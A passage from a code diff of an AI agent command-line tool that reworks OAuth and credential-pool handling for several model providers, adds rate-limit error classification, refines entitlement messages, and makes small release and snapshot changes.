self._final_content_delivered = True
except Exception as e:
logger.error("Stream consumer error: %s", e)
@@ -778,6 +779,7 @@ class GatewayStreamConsumer:
pass
self._already_sent = True
self._final_response_sent = True
self._final_content_delivered = True
return
raw_limit = getattr(self.adapter, "MAX_MESSAGE_LENGTH", 4096)
@@ -814,11 +816,13 @@ class GatewayStreamConsumer:
if not result or not result.success:
if sent_any_chunk:
# Some continuation text already reached the user. Suppress
# the base gateway final-send path so we don't resend the
# full response and create another duplicate.
# Some continuation text already reached the user, but not
# the full response. Do NOT set _final_response_sent — the
# base gateway final-send path should still deliver the
# complete response so the user gets the full answer.
# Suppress only _already_sent to avoid a duplicate send
# of the same partial content.
self._already_sent = True
self._final_response_sent = True
self._message_id = last_message_id
self._last_sent_text = last_successful_chunk
self._fallback_prefix = ""
@@ -856,6 +860,7 @@ class GatewayStreamConsumer:
self._message_id = last_message_id
self._already_sent = True
self._final_response_sent = True
self._final_content_delivered = True
self._last_sent_text = chunks[-1]
self._fallback_prefix = ""
+2 -2
@@ -14,8 +14,8 @@ Provides subcommands for:
import os
import sys
__version__ = "0.14.0"
__release_date__ = "2026.5.16"
__version__ = "0.15.1"
__release_date__ = "2026.5.29"
def _ensure_utf8():
+386 -58
@@ -379,14 +379,6 @@ PROVIDER_REGISTRY: Dict[str, ProviderConfig] = {
api_key_env_vars=("NVIDIA_API_KEY",),
base_url_env_var="NVIDIA_BASE_URL",
),
"ai-gateway": ProviderConfig(
id="ai-gateway",
name="Vercel AI Gateway",
auth_type="api_key",
inference_base_url="https://ai-gateway.vercel.sh/v1",
api_key_env_vars=("AI_GATEWAY_API_KEY",),
base_url_env_var="AI_GATEWAY_BASE_URL",
),
"opencode-zen": ProviderConfig(
id="opencode-zen",
name="OpenCode Zen",
@@ -402,6 +394,7 @@ PROVIDER_REGISTRY: Dict[str, ProviderConfig] = {
# OpenCode Go mixes API surfaces by model:
# - GLM / Kimi use OpenAI-compatible chat completions under /v1
# - MiniMax models use Anthropic Messages under /v1/messages
# - Qwen 3.7 uses Anthropic Messages under /v1/messages
# Keep the provider base at /v1 and select api_mode per-model.
inference_base_url="https://opencode.ai/zen/go/v1",
api_key_env_vars=("OPENCODE_GO_API_KEY",),
@@ -736,6 +729,12 @@ def _resolve_zai_base_url(api_key: str, default_url: str, env_override: str) ->
# Error Types
# =============================================================================
# Error code marking upstream rate-limit / usage-quota exhaustion (HTTP 429).
# Such failures are transient and re-authenticating cannot resolve them, so
# they must be kept distinct from missing/expired-credential errors.
CODEX_RATE_LIMITED_CODE = "codex_rate_limited"
class AuthError(RuntimeError):
"""Structured auth error with UX mapping hints."""
@@ -753,25 +752,68 @@ class AuthError(RuntimeError):
self.relogin_required = relogin_required
def is_rate_limited_auth_error(error: Exception) -> bool:
"""True when an :class:`AuthError` represents upstream rate-limiting / quota
exhaustion rather than missing or invalid credentials.
These failures are transient (re-authenticating cannot resolve them), so
callers should surface a "retry later" notice and prefer a fallback chain
instead of prompting the operator to run ``hermes auth``.
"""
return (
isinstance(error, AuthError)
and not error.relogin_required
and error.code == CODEX_RATE_LIMITED_CODE
)
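A small sketch of how the predicate separates the two failure kinds. `SketchAuthError` is a stand-in with an assumed constructor, not the real `AuthError` signature, and `describe` only mirrors the two branches of `format_auth_error` that matter here.

```python
from typing import Optional

RATE_LIMITED_CODE = "codex_rate_limited"


class SketchAuthError(RuntimeError):
    """Stand-in for AuthError; the constructor shape is an assumption."""

    def __init__(
        self, message: str, *, code: Optional[str] = None, relogin_required: bool = False
    ) -> None:
        super().__init__(message)
        self.code = code
        self.relogin_required = relogin_required


def is_rate_limited(error: Exception) -> bool:
    """True for quota/429 failures, which re-authentication cannot fix."""
    return (
        isinstance(error, SketchAuthError)
        and not error.relogin_required
        and error.code == RATE_LIMITED_CODE
    )


def describe(error: Exception) -> str:
    """Append the re-auth hint only for genuine credential problems."""
    if is_rate_limited(error):
        return str(error)
    if getattr(error, "relogin_required", False):
        return f"{error} Run `hermes model` to re-authenticate."
    return str(error)
```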
def _parse_retry_after_seconds(headers: Any) -> Optional[int]:
"""Best-effort parse of a ``Retry-After`` header into whole seconds.
Supports the delta-seconds form (e.g. ``"120"``). HTTP-date forms and
missing/unparseable values return ``None`` rather than guessing.
"""
if headers is None:
return None
try:
raw = headers.get("retry-after")
except Exception:
return None
if raw is None:
return None
try:
seconds = int(str(raw).strip())
except (TypeError, ValueError):
return None
return seconds if seconds >= 0 else None
def format_auth_error(error: Exception) -> str:
"""Map auth failures to concise user-facing guidance."""
if not isinstance(error, AuthError):
return str(error)
# Rate-limit / quota errors are not credential problems — never append the
# "re-authenticate" remediation, which would mislead the operator.
if is_rate_limited_auth_error(error):
return str(error)
if error.relogin_required:
return f"{error} Run `hermes model` to re-authenticate."
if error.code == "subscription_required":
return (
"No active paid subscription found on Nous Portal. "
"Please purchase/activate a subscription, then retry."
)
if error.provider == "nous":
return _format_nous_entitlement_auth_error(error)
return "No active paid subscription found. Please purchase/activate a subscription, then retry."
if error.code == "insufficient_credits":
return (
"Subscription credits are exhausted. "
"Top up/renew credits in Nous Portal, then retry."
)
if error.provider == "nous":
return _format_nous_entitlement_auth_error(error)
return "Subscription credits are exhausted. Top up/renew credits, then retry."
if error.code in {"subscription_expired", "no_usable_credits", "account_missing"}:
if error.provider == "nous":
return _format_nous_entitlement_auth_error(error)
if error.code == "temporarily_unavailable":
return f"{error} Please retry in a few seconds."
@@ -779,6 +821,25 @@ def format_auth_error(error: Exception) -> str:
return str(error)
def _format_nous_entitlement_auth_error(error: AuthError) -> str:
try:
from hermes_cli.nous_account import (
format_nous_portal_entitlement_message,
get_nous_portal_account_info,
)
account_info = get_nous_portal_account_info(force_fresh=True)
message = format_nous_portal_entitlement_message(
account_info,
capability="Nous model access",
)
if message:
return message
except Exception:
pass
return f"{error} Check credits or billing in Nous Portal, then retry."
def _token_fingerprint(token: Any) -> Optional[str]:
"""Return a short hash fingerprint for telemetry without leaking token bytes."""
if not isinstance(token, str):
@@ -1085,11 +1146,32 @@ def _save_auth_store(auth_store: Dict[str, Any]) -> Path:
def _load_provider_state(auth_store: Dict[str, Any], provider_id: str) -> Optional[Dict[str, Any]]:
"""Return a provider's persisted state.
In profile mode, falls back to the global-root ``auth.json`` when the
profile has no entry for ``provider_id``. This mirrors the per-provider
shadowing already used by ``read_credential_pool``: workers spawned in a
profile can see providers (e.g. ``nous``) that were only authenticated at
global scope. Once the user runs ``hermes auth login <provider>`` inside
the profile, the profile state fully shadows the global state on the next
read. See issue #18594 follow-up.
"""
providers = auth_store.get("providers")
if not isinstance(providers, dict):
return None
state = providers.get(provider_id)
return dict(state) if isinstance(state, dict) else None
if isinstance(providers, dict):
state = providers.get(provider_id)
if isinstance(state, dict):
return dict(state)
# Read-only fallback to the global-root auth store (profile mode only;
# returns empty dict in classic mode so this is a no-op).
global_store = _load_global_auth_store()
if global_store:
global_providers = global_store.get("providers")
if isinstance(global_providers, dict):
global_state = global_providers.get(provider_id)
if isinstance(global_state, dict):
return dict(global_state)
return None
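The per-provider shadowing described in the docstring above can be sketched as follows. This is a minimal illustration, not the project's implementation: `load_provider_state` and its two explicit store arguments are hypothetical stand-ins for `_load_provider_state` and `_load_global_auth_store()`.

```python
from typing import Any, Dict, Optional


def load_provider_state(
    profile_store: Dict[str, Any],
    global_store: Dict[str, Any],
    provider_id: str,
) -> Optional[Dict[str, Any]]:
    """Return the profile's state for provider_id, else the global one."""
    # Profile store is consulted first, so it always shadows the global store.
    for store in (profile_store, global_store):
        providers = store.get("providers")
        if isinstance(providers, dict):
            state = providers.get(provider_id)
            if isinstance(state, dict):
                return dict(state)  # copy so callers cannot mutate the store
    return None


profile = {"providers": {"nous": {"access_token": "profile-token"}}}
global_root = {
    "providers": {
        "nous": {"access_token": "global-token"},
        "xai": {"access_token": "global-xai"},
    }
}
```

With these inputs, `nous` resolves from the profile and `xai` falls through to the global store; an empty global store (classic mode in the original) makes the second pass a no-op.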
def _save_provider_state(auth_store: Dict[str, Any], provider_id: str, state: Dict[str, Any]) -> None:
@@ -1243,23 +1325,18 @@ def unsuppress_credential_source(provider_id: str, source: str) -> bool:
def get_provider_auth_state(provider_id: str) -> Optional[Dict[str, Any]]:
"""Return persisted auth state for a provider, or None.
In profile mode, falls back to the global-root ``auth.json`` when the
profile has no state for this provider. Profile state always wins when
present. Writes (``_save_auth_store`` / ``persist_*_credentials``) are
unchanged; they still target the profile only. This mirrors
In profile mode, ``_load_provider_state`` already falls back to the
global-root ``auth.json`` per-provider when the profile has no entry,
so this is now a thin convenience wrapper. Profile state always wins
when present. Writes (``_save_auth_store`` / ``persist_*_credentials``)
are unchanged; they still target the profile only. This mirrors
``read_credential_pool``'s per-provider shadowing semantics so that
``_seed_from_singletons`` can reseed a profile's credential pool from
global-scope provider state (e.g. a globally-authenticated Anthropic
OAuth or Nous device-code session). See issue #18594 follow-up.
"""
auth_store = _load_auth_store()
state = _load_provider_state(auth_store, provider_id)
if state is not None:
return state
global_store = _load_global_auth_store()
if not global_store:
return None
return _load_provider_state(global_store, provider_id)
return _load_provider_state(auth_store, provider_id)
def get_active_provider() -> Optional[str]:
@@ -1439,7 +1516,6 @@ def resolve_provider(
"github": "copilot", "github-copilot": "copilot",
"github-models": "copilot", "github-model": "copilot",
"github-copilot-acp": "copilot-acp", "copilot-acp-agent": "copilot-acp",
"aigateway": "ai-gateway", "vercel": "ai-gateway", "vercel-ai-gateway": "ai-gateway",
"opencode": "opencode-zen", "zen": "opencode-zen",
"qwen-portal": "qwen-oauth", "qwen-cli": "qwen-oauth", "qwen-oauth": "qwen-oauth", "google-gemini-cli": "google-gemini-cli", "gemini-cli": "google-gemini-cli", "gemini-oauth": "google-gemini-cli",
"hf": "huggingface", "hugging-face": "huggingface", "huggingface-hub": "huggingface",
@@ -3105,6 +3181,9 @@ def _prompt_manual_callback_paste(redirect_uri: str) -> dict:
print("not on your laptop) — that is expected. Copy the FULL URL")
print("from your browser's address bar of that failed page and paste")
print("it below. A bare '?code=...&state=...' fragment also works.")
print("If the consent page shows the authorization code in-page")
print("(xAI's current behavior) rather than redirecting, paste the")
print("bare code value on its own.")
print("───────────────────────────────────────────────────────────────")
try:
raw = input("Callback URL: ")
@@ -3231,6 +3310,77 @@ def _read_codex_tokens(*, _lock: bool = True) -> Dict[str, Any]:
}
def _sync_codex_pool_entries(
auth_store: Dict[str, Any],
tokens: Dict[str, str],
last_refresh: Optional[str],
) -> None:
"""Mirror a fresh Codex re-auth into the credential_pool OAuth entries.
The runtime selects credentials from ``credential_pool.openai-codex``, not
from ``providers.openai-codex.tokens``. A re-auth invalidates the prior
OAuth pair server-side, but pool entries keep holding the now-consumed
refresh token plus any stale error markers, so the next request spends a
dead token and gets a 401 ``token_invalidated``.
What gets refreshed:
* ``device_code``: the singleton-seeded entry written by the device-code
OAuth flow when the user logged in via ``hermes setup`` / the model
picker. Always synced with the fresh tokens.
* ``manual:device_code``: entries created by ``hermes auth add openai-codex``
that use the same device-code OAuth mechanism. An interactive re-auth
proves the user owns the ChatGPT account, so it is safe (and expected)
to refresh these entries too. Without this, a user who once ran the
``hermes auth add`` workaround for #33000 would silently leave that
manual entry stale on every subsequent re-auth, recreating the issue
reported in #33538.
What does NOT get refreshed:
* ``manual:api_key`` and any other non-device-code manual sources: those
are independent credentials (an explicit API key, a different ChatGPT
account, etc.) and must not be overwritten by a single re-auth.
Error markers (``last_status``, ``last_error_*``) are also cleared on
every device-code-backed entry, even those whose tokens we did not
rewrite, so that an interactive re-auth gives every relevant pool entry
a fresh selection chance instead of leaving them marked unhealthy from a
pre-re-auth 401.
"""
access_token = tokens.get("access_token")
if not access_token:
return
refresh_token = tokens.get("refresh_token")
pool = auth_store.get("credential_pool")
if not isinstance(pool, dict):
return
entries = pool.get("openai-codex")
if not isinstance(entries, list):
return
# Sources whose tokens should be rewritten by a fresh Codex device-code
# OAuth re-auth. ``manual:api_key`` and unknown sources are intentionally
# excluded — they represent independent credentials.
REFRESHABLE_SOURCES = {"device_code", "manual:device_code"}
for entry in entries:
if not isinstance(entry, dict):
continue
source = entry.get("source")
if source not in REFRESHABLE_SOURCES:
continue
entry["access_token"] = access_token
if refresh_token:
entry["refresh_token"] = refresh_token
if last_refresh:
entry["last_refresh"] = last_refresh
entry["last_status"] = None
entry["last_status_at"] = None
entry["last_error_code"] = None
entry["last_error_reason"] = None
entry["last_error_message"] = None
entry["last_error_reset_at"] = None
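To make the source filter concrete, here is a simplified sketch of the same sync applied to a small pool. It assumes the entry shape shown in the hunk above; `sync_pool_entries` is a hypothetical standalone version that takes the entry list directly and omits the `last_refresh` handling.

```python
from typing import Any, List, Optional

# Sources that a device-code re-auth is allowed to rewrite (from the hunk above).
REFRESHABLE_SOURCES = {"device_code", "manual:device_code"}
ERROR_MARKERS = (
    "last_status",
    "last_status_at",
    "last_error_code",
    "last_error_reason",
    "last_error_message",
    "last_error_reset_at",
)


def sync_pool_entries(
    entries: List[Any], access_token: str, refresh_token: Optional[str] = None
) -> None:
    """Rewrite tokens and clear error markers on device-code-backed entries."""
    for entry in entries:
        if not isinstance(entry, dict):
            continue
        if entry.get("source") not in REFRESHABLE_SOURCES:
            continue  # independent credential (e.g. an API key): leave untouched
        entry["access_token"] = access_token
        if refresh_token:
            entry["refresh_token"] = refresh_token
        for key in ERROR_MARKERS:
            entry[key] = None


pool = [
    {"source": "device_code", "access_token": "old", "last_error_code": 401},
    {"source": "manual:api_key", "access_token": "sk-independent"},
]
sync_pool_entries(pool, "new-access", "new-refresh")
```

After the call, the first entry carries the fresh token pair with its error markers reset, while the `manual:api_key` entry is unchanged.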
def _save_codex_tokens(tokens: Dict[str, str], last_refresh: str = None) -> None:
"""Save Codex OAuth tokens to Hermes auth store (~/.hermes/auth.json)."""
if last_refresh is None:
@@ -3242,6 +3392,7 @@ def _save_codex_tokens(tokens: Dict[str, str], last_refresh: str = None) -> None
state["last_refresh"] = last_refresh
state["auth_mode"] = "chatgpt"
_save_provider_state(auth_store, "openai-codex", state)
_sync_codex_pool_entries(auth_store, tokens, last_refresh)
_save_auth_store(auth_store)
@@ -3273,6 +3424,30 @@ def refresh_codex_oauth_pure(
},
)
if response.status_code == 429:
# Upstream rate-limit / usage-quota exhaustion on the token endpoint.
# The stored refresh token is still valid here — re-authenticating
# cannot lift a quota cap. Classify distinctly from auth failures so
# callers surface a "retry later" notice instead of a misleading
# "run hermes auth" prompt (see issue #32790).
retry_after = _parse_retry_after_seconds(getattr(response, "headers", None))
if retry_after is not None:
message = (
f"Codex provider quota exhausted (429); retry after {retry_after}s. "
"Credentials are still valid."
)
else:
message = (
"Codex provider quota exhausted (429). Credentials are still valid; "
"retry after the usage limit resets."
)
raise AuthError(
message,
provider="openai-codex",
code=CODEX_RATE_LIMITED_CODE,
relogin_required=False,
)
if response.status_code != 200:
code = "codex_refresh_failed"
message = f"Codex token refresh failed with status {response.status_code}."
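The 429 branch above separates quota exhaustion from credential failure. The sketch below shows one way the message could be derived. `parse_retry_after` and `quota_message` are hypothetical names, the parser only handles the integer-seconds form of `Retry-After` (not the HTTP-date form), and it assumes a plain mapping with exact-case keys.

```python
from typing import Mapping, Optional


def parse_retry_after(headers: Optional[Mapping[str, str]]) -> Optional[int]:
    """Return Retry-After as non-negative seconds, or None if unusable."""
    if not headers:
        return None
    try:
        seconds = int(str(headers.get("Retry-After", "")).strip())
    except (TypeError, ValueError):
        return None
    return seconds if seconds >= 0 else None


def quota_message(status_code: int, headers: Optional[Mapping[str, str]]) -> Optional[str]:
    """Build the retry-later notice for a 429; return None for other statuses."""
    if status_code != 429:
        return None
    retry_after = parse_retry_after(headers)
    if retry_after is not None:
        return (
            f"Codex provider quota exhausted (429); retry after {retry_after}s. "
            "Credentials are still valid."
        )
    return (
        "Codex provider quota exhausted (429). Credentials are still valid; "
        "retry after the usage limit resets."
    )
```

Keeping the 429 check ahead of the generic non-200 handling is what prevents a quota cap from being reported as a refresh failure that prompts re-authentication.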
@@ -3410,8 +3585,36 @@ def resolve_codex_runtime_credentials(
refresh_if_expiring: bool = True,
refresh_skew_seconds: int = CODEX_ACCESS_TOKEN_REFRESH_SKEW_SECONDS,
) -> Dict[str, Any]:
"""Resolve runtime credentials from Hermes's own Codex token store."""
data = _read_codex_tokens()
"""Resolve runtime credentials from Hermes's own Codex token store.
Falls back to the credential pool when the singleton (``providers.openai-codex.tokens``)
has no usable access_token but the pool (``credential_pool.openai-codex``) does. This
closes the divergence between the chat path (singleton-only via this function) and
the auxiliary path (pool-first via ``_read_codex_access_token``). Without this
fallback, a user whose tokens live only in the pool (for example after a manual
pool seed, a partial re-auth, or pool-only restoration from a backup) gets a bare
HTTP 401 ``Missing Authentication header`` from the wire instead of a usable
credential. See issue #32992.
"""
try:
data = _read_codex_tokens()
except AuthError:
pool_token = _pool_codex_access_token()
if pool_token:
base_url = (
os.getenv("HERMES_CODEX_BASE_URL", "").strip().rstrip("/")
or DEFAULT_CODEX_BASE_URL
)
return {
"provider": "openai-codex",
"base_url": base_url,
"api_key": pool_token,
"source": "credential_pool",
"last_refresh": None,
"auth_mode": "chatgpt",
}
raise
tokens = dict(data["tokens"])
access_token = str(tokens.get("access_token", "") or "").strip()
refresh_timeout_seconds = float(os.getenv("HERMES_CODEX_REFRESH_TIMEOUT_SECONDS", "20"))
@@ -3449,6 +3652,46 @@ def resolve_codex_runtime_credentials(
}
def _pool_codex_access_token() -> str:
"""Return the most-recent usable access_token from the openai-codex pool.
Used as a fallback by ``resolve_codex_runtime_credentials`` when the
singleton has no creds. Reads ``credential_pool.openai-codex`` entries
directly from auth.json and picks the first non-empty access_token,
skipping entries that are currently in an exhaustion cooldown.
Returns ``""`` when no usable entry is found (caller handles by raising
the original AuthError).
"""
try:
with _auth_store_lock():
auth_store = _load_auth_store()
pool = auth_store.get("credential_pool")
if not isinstance(pool, dict):
return ""
entries = pool.get("openai-codex")
if not isinstance(entries, list):
return ""
def _entry_usable(entry: Dict[str, Any]) -> bool:
if not isinstance(entry, dict):
return False
token = entry.get("access_token")
if not isinstance(token, str) or not token.strip():
return False
# Skip entries currently in an exhaustion cooldown window.
reset_at = entry.get("last_error_reset_at")
if isinstance(reset_at, (int, float)) and reset_at > time.time():
return False
return True
for entry in entries:
if _entry_usable(entry):
return str(entry.get("access_token", "")).strip()
except Exception:
logger.debug("Codex pool fallback lookup failed", exc_info=True)
return ""
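The selection rule used by the pool fallback can be exercised in isolation. The sketch below is a hypothetical pure-function variant (`first_usable_token`) that takes the entry list and an injectable `now` timestamp, so the cooldown check is testable without touching `auth.json` or the store lock.

```python
import time
from typing import Any, List, Optional


def first_usable_token(entries: List[Any], now: Optional[float] = None) -> str:
    """Return the first non-empty access_token not in a cooldown window."""
    now = time.time() if now is None else now
    for entry in entries:
        if not isinstance(entry, dict):
            continue
        token = entry.get("access_token")
        if not isinstance(token, str) or not token.strip():
            continue
        # An entry whose reset time lies in the future is still cooling down.
        reset_at = entry.get("last_error_reset_at")
        if isinstance(reset_at, (int, float)) and reset_at > now:
            continue
        return token.strip()
    return ""


entries = [
    {"access_token": "cooling", "last_error_reset_at": 200.0},
    {"access_token": "   "},
    {"access_token": " ready ", "last_error_reset_at": 50.0},
]
```

At `now=100.0` the first entry is skipped because its reset time is still ahead, the second is skipped as blank, and the third is returned stripped.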
# =============================================================================
# xAI Grok OAuth — tokens stored in ~/.hermes/auth.json
# =============================================================================
@@ -5437,6 +5680,8 @@ def _empty_nous_auth_status() -> Dict[str, Any]:
"access_expires_at": None,
"agent_key_expires_at": None,
"has_refresh_token": False,
"inference_credential_present": False,
"credential_source": None,
}
@@ -5465,24 +5710,36 @@ def _snapshot_nous_pool_status() -> Dict[str, Any]:
return (agent_exp, access_exp, -priority)
entry = max(entries, key=_entry_sort_key)
access_token = (
getattr(entry, "access_token", None)
or getattr(entry, "runtime_api_key", "")
)
if not access_token:
runtime_key = getattr(entry, "runtime_api_key", None) or getattr(entry, "access_token", "")
if not runtime_key:
return _empty_nous_auth_status()
access_token = getattr(entry, "access_token", None)
auth_type = str(getattr(entry, "auth_type", "") or "").strip().lower()
refresh_token = getattr(entry, "refresh_token", None)
is_portal_oauth = bool(access_token) and (
auth_type.startswith("oauth") or bool(refresh_token)
)
label = getattr(entry, "label", "unknown")
portal_status_url = None
if is_portal_oauth:
portal_status_url = (
getattr(entry, "portal_base_url", None)
or DEFAULT_NOUS_PORTAL_URL
)
return {
"logged_in": True,
"portal_base_url": getattr(entry, "portal_base_url", None)
or getattr(entry, "base_url", None),
"logged_in": is_portal_oauth,
"portal_base_url": portal_status_url,
"inference_base_url": getattr(entry, "inference_base_url", None)
or getattr(entry, "runtime_base_url", None)
or getattr(entry, "base_url", None),
"access_token": access_token,
"access_token": access_token if is_portal_oauth else None,
"access_expires_at": getattr(entry, "expires_at", None),
"agent_key_expires_at": getattr(entry, "agent_key_expires_at", None),
"has_refresh_token": bool(getattr(entry, "refresh_token", None)),
"source": f"pool:{getattr(entry, 'label', 'unknown')}",
"has_refresh_token": bool(refresh_token),
"inference_credential_present": True,
"credential_source": f"pool:{label}",
"source": f"pool:{label}",
}
except Exception:
return _empty_nous_auth_status()
@@ -5565,6 +5822,10 @@ def _compute_nous_auth_status() -> Dict[str, Any]:
"agent_key_expires_at": state.get("agent_key_expires_at"),
"has_refresh_token": bool(state.get("refresh_token")),
"access_token": state.get("access_token"),
"inference_credential_present": bool(
state.get("access_token") or state.get("agent_key")
),
"credential_source": "auth_store",
"source": "auth_store",
}
try:
@@ -5582,6 +5843,8 @@ def _compute_nous_auth_status() -> Dict[str, Any]:
or refreshed_state.get("agent_key_expires_at")
or base_status.get("agent_key_expires_at"),
"has_refresh_token": bool(refreshed_state.get("refresh_token")),
"inference_credential_present": True,
"credential_source": "auth_store",
"source": f"runtime:{creds.get('source', 'portal')}",
"key_id": creds.get("key_id"),
}
@@ -6093,6 +6356,7 @@ def _prompt_model_selection(
pricing: Optional[Dict[str, Dict[str, str]]] = None,
unavailable_models: Optional[List[str]] = None,
portal_url: str = "",
unavailable_message: str = "",
) -> Optional[str]:
"""Interactive model selection. Puts current_model first with a marker. Returns chosen model ID or None.
@@ -6184,18 +6448,22 @@ def _prompt_model_selection(
choices.append(" Enter custom model name")
choices.append(" Skip (keep current)")
_upgrade_url = (portal_url or DEFAULT_NOUS_PORTAL_URL).rstrip("/")
unavailable_footer = unavailable_message.strip()
if not unavailable_footer and _unavailable:
unavailable_footer = f"Upgrade at {_upgrade_url} for paid models"
# Print the unavailable block BEFORE the menu via regular print().
# simple_term_menu pads title lines to terminal width (causes wrapping),
# so we keep the title minimal and use stdout for the static block.
# clear_screen=False means our printed output stays visible above.
_upgrade_url = (portal_url or DEFAULT_NOUS_PORTAL_URL).rstrip("/")
if _unavailable:
print(menu_title)
print()
for mid in _unavailable:
print(f"{_DIM} {_label(mid)}{_RESET}")
print()
print(f"{_DIM} ── Upgrade at {_upgrade_url} for paid models ──{_RESET}")
print(f"{_DIM} ── {unavailable_footer} ──{_RESET}")
print()
effective_title = "Available free models:"
else:
@@ -6237,8 +6505,11 @@ def _prompt_model_selection(
if _unavailable:
_upgrade_url = (portal_url or DEFAULT_NOUS_PORTAL_URL).rstrip("/")
unavailable_footer = unavailable_message.strip() or (
f"Unavailable models (requires paid tier — upgrade at {_upgrade_url})"
)
print()
print(f" {_DIM}── Unavailable models (requires paid tier — upgrade at {_upgrade_url}) ──{_RESET}")
print(f" {_DIM}── {unavailable_footer} ──{_RESET}")
for mid in _unavailable:
print(f" {'':>{num_width}} {_DIM}{_label(mid)}{_RESET}")
print()
@@ -6587,6 +6858,12 @@ def _xai_oauth_loopback_login(
remote VM). The same PKCE verifier, ``state``, and ``nonce`` are
used for both paths so the upstream-side OAuth flow is identical.
"""
def _stdin_supports_manual_paste() -> bool:
try:
return bool(getattr(sys.stdin, "isatty", lambda: False)())
except Exception:
return False
discovery = _xai_oauth_discovery(timeout_seconds)
authorization_endpoint = discovery["authorization_endpoint"]
token_endpoint = discovery["token_endpoint"]
@@ -6650,12 +6927,28 @@ def _xai_oauth_loopback_login(
else:
print("Could not open the browser automatically; use the URL above.")
callback = _xai_wait_for_callback(
server,
thread,
callback_result,
timeout_seconds=max(30.0, timeout_seconds * 9),
)
try:
callback = _xai_wait_for_callback(
server,
thread,
callback_result,
timeout_seconds=max(30.0, timeout_seconds * 9),
)
except AuthError as exc:
if (
getattr(exc, "code", "") != "xai_callback_timeout"
or not _stdin_supports_manual_paste()
):
raise
print()
print("xAI loopback callback timed out.")
print("If your browser reached a failed 127.0.0.1 callback page,")
print("paste that FULL callback URL below to continue this login.")
print("You can also re-run with `--manual-paste` to skip the")
print("loopback listener from the start.")
callback = _prompt_manual_callback_paste(redirect_uri)
if callback.get("code") is None and callback.get("error") is None:
raise exc
except Exception:
try:
server.shutdown()
@@ -6675,7 +6968,21 @@ def _xai_oauth_loopback_login(
provider="xai-oauth",
code="xai_authorization_failed",
)
if callback.get("state") != state:
callback_state = callback.get("state")
# Manual-paste bare-code path: when a user pastes only the opaque
# authorization code (no ``code=``/``state=`` query parameters),
# ``_parse_pasted_callback`` returns ``state=None``. xAI's consent
# page renders the code in-page rather than redirecting through the
# 127.0.0.1 callback, so on many remote setups (Cloud Shell, headless
# VPS, container consoles) the bare code is the only thing the user
# can obtain. PKCE (code_verifier) still binds the exchange to this
# client, so the local state-equality check is redundant on the
# bare-code path — we substitute the locally generated state to keep
# the rest of the validation chain (and the token exchange) unchanged.
# See #26923 (AccursedGalaxy comment, 2026-05-20).
if callback_state is None and manual_paste:
callback_state = state
if callback_state != state:
raise AuthError(
"xAI authorization failed: state mismatch.",
provider="xai-oauth",
@@ -7436,8 +7743,9 @@ def _nous_device_code_login(
portal_url = auth_state.get(
"portal_base_url", DEFAULT_NOUS_PORTAL_URL
).rstrip("/")
message = format_auth_error(exc)
print()
print("Your Nous Portal account does not have an active subscription.")
print(message)
print(f" Subscribe here: {portal_url}/billing")
print()
print("After subscribing, run `hermes model` again to finish setup.")
@@ -7547,11 +7855,30 @@ def _login_nous(args, pconfig: ProviderConfig) -> None:
print()
unavailable_models: list = []
unavailable_message = ""
if model_ids:
pricing = get_pricing_for_provider("nous")
free_tier = check_nous_free_tier()
# Force fresh account data for model selection so recent credit
# purchases are reflected immediately.
free_tier = check_nous_free_tier(force_fresh=True)
_portal_for_recs = auth_state.get("portal_base_url", "")
if free_tier:
try:
from hermes_cli.nous_account import (
format_nous_portal_entitlement_message,
get_nous_portal_account_info,
)
_account_info = get_nous_portal_account_info(force_fresh=True)
unavailable_message = (
format_nous_portal_entitlement_message(
_account_info,
capability="paid Nous models",
)
or ""
)
except Exception:
unavailable_message = ""
# The Portal's freeRecommendedModels endpoint is the
# source of truth for what's free *right now*. Augment
# the curated list with anything new the Portal flags
@@ -7578,11 +7905,12 @@ def _login_nous(args, pconfig: ProviderConfig) -> None:
model_ids, pricing=pricing,
unavailable_models=unavailable_models,
portal_url=_portal,
unavailable_message=unavailable_message,
)
elif unavailable_models:
_url = (_portal or DEFAULT_NOUS_PORTAL_URL).rstrip("/")
print("No free models currently available.")
print(f"Upgrade at {_url} to access paid models.")
print(unavailable_message or f"Upgrade at {_url} to access paid models.")
else:
print("No curated models available for Nous Portal.")
except Exception as exc:
+5 -2
@@ -512,6 +512,7 @@ def _quick_snapshot_root(hermes_home: Optional[Path] = None) -> Path:
def create_quick_snapshot(
label: Optional[str] = None,
hermes_home: Optional[Path] = None,
keep: Optional[int] = None,
) -> Optional[str]:
"""Create a quick state snapshot of critical files.
@@ -585,8 +586,10 @@ def create_quick_snapshot(
with open(snap_dir / "manifest.json", "w", encoding="utf-8") as f:
json.dump(meta, f, indent=2)
# Auto-prune
_prune_quick_snapshots(root, keep=_QUICK_DEFAULT_KEEP)
# Auto-prune. Defaults preserve historical manual /snapshot behavior; callers
# with known high-churn safety snapshots (for example pre-update) can pass a
# smaller keep value so large state.db copies do not accumulate indefinitely.
_prune_quick_snapshots(root, keep=_QUICK_DEFAULT_KEEP if keep is None else keep)
logger.info("State snapshot created: %s (%d files)", snap_id, len(manifest))
return snap_id
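The `keep is None` test in the prune call matters because it lets a caller pass `keep=0` explicitly, which a `keep or default` expression would silently replace with the default. A minimal sketch of that behaviour follows; `prune_snapshots`, its `default_keep` value of 20, and the timestamp-style ids are all illustrative assumptions, not the project's actual values.

```python
from typing import List, Optional


def prune_snapshots(
    snapshot_ids: List[str],
    keep: Optional[int] = None,
    default_keep: int = 20,  # hypothetical default, not the real _QUICK_DEFAULT_KEEP
) -> List[str]:
    """Return the snapshot ids that survive pruning, newest first."""
    effective = default_keep if keep is None else keep
    # Assumes ids sort lexicographically by creation time.
    newest_first = sorted(snapshot_ids, reverse=True)
    return newest_first[: max(effective, 0)]


ids = ["20260101-000000", "20260102-000000", "20260103-000000"]
```

A high-churn caller such as a pre-update hook could pass `keep=1` to retain only the newest snapshot, while manual snapshots keep the default.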
+29 -1
@@ -300,14 +300,42 @@ def _git_short_hash(repo_dir: Path, rev: str) -> Optional[str]:
def get_git_banner_state(repo_dir: Optional[Path] = None) -> Optional[dict]:
"""Return upstream/local git hashes for the startup banner."""
"""Return upstream/local git hashes for the startup banner.
For source installs and dev images this runs ``git rev-parse`` against
the active checkout. When no checkout is available (the canonical case
is the published Docker image, which excludes ``.git`` from the build
context), we fall back to the baked-in build SHA (see
``hermes_cli/build_info.py``) and return it as a frozen
``upstream == local`` state with ``ahead=0``. A built image is by
definition pinned to one commit, so "ahead" is always zero and the
banner correctly shows ``· upstream <sha>`` with no carried-commits
annotation.
"""
repo_dir = repo_dir or _resolve_repo_dir()
if repo_dir is None:
# No git checkout — try the baked build SHA (Docker image path).
try:
from hermes_cli.build_info import get_build_sha
baked = get_build_sha(short=8)
